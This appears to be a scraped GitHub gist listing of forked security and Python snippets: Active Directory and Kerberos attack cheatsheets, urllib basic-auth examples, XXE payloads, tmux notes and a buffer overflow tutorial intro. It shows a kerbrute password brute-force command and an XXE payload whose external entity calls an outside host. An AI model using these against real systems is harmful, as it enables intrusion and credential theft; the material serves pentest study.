Note: I did not author this, i found it somehwere.
- Tools
- Most common paths to AD compromise
- [GPO - Pivoting with Local Admin
Murthysagi
/ Active Directory Attacks.md
Created
October 27, 2020 19:36
— forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp
Murthysagi
/ kerberos_attacks_cheatsheet.md
Created
July 15, 2020 18:20
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Murthysagi
/ Python_Urllib_Basic_Auth_Query.py
Created
February 16, 2019 19:50
— forked from artttj/Python_Urllib_Basic_Auth_Query.py
Python 3.4 Urllib Basic Auth: the script sends JSON data via POST request using HTTP Basic authentication and urllib.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib.request | |
| import urllib.response | |
| userName = "user" | |
| passWord = "password" | |
| top_level_url = "http://127.0.0.1/api/update" | |
| # create an authorization handler | |
| p = urllib.request.HTTPPasswordMgrWithDefaultRealm() | |
| p.add_password(None, top_level_url, userName, passWord); |
Murthysagi
/ urllib-request-Request.py
Last active
February 12, 2019 07:24
— forked from kaito834/urllib-request-Request.py
Python 3: urllib.request and json sample
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # tested by Python 3.4.3 on Windows 8.1 | |
| # Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32 | |
| # If you need to access web site/service via proxy, set http_proxy or https_proxy. | |
| # https://docs.python.org/3/library/urllib.request.html#urllib.request.ProxyHandler | |
| # set http_proxy=http://127.0.0.1:8888/ | |
| # set https_proxy=https://127.0.0.1:8888/ |
Murthysagi
/ urllib-request_basicAuth.py
Created
February 11, 2019 14:08
— forked from kaito834/urllib-request_basicAuth.py
Python 3.x snippet code for Basic Authentication HTTP request by urllib.request
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # I tested by Python 3.4.3 on Windows 8.1 | |
| # Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32 | |
| import urllib.request | |
| import getpass | |
| # If you access to url below via Proxy, | |
| # set environment variable 'http_proxy' before execute this. |
Murthysagi
/ XXE_payloads
Created
September 3, 2018 19:03
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
Murthysagi
/ tmux-cheats.md
Created
August 27, 2018 18:42
— forked from Starefossen/tmux-cheats.md
My personal tmux cheat sheet for working with sessions, windows, and panes. `NB` I have remapped the command prefix to `ctrl` + `a`.
Murthysagi
/ how-to-oscp-final.md
Created
July 31, 2018 14:19
— forked from unfo/how-to-oscp-final.md
Murthysagi
/ Buffer Overflow Tutorial in Kali.md
Created
January 18, 2018 17:12
— forked from apolloclark/Buffer Overflow Tutorial in Kali.md
Buffer overflow demonstration in Kali Linux, based on the Computerphile video
This tutorial is based on the Computerphile video, made by Dr. Mike Pound
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow attack against a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent
NewerOlder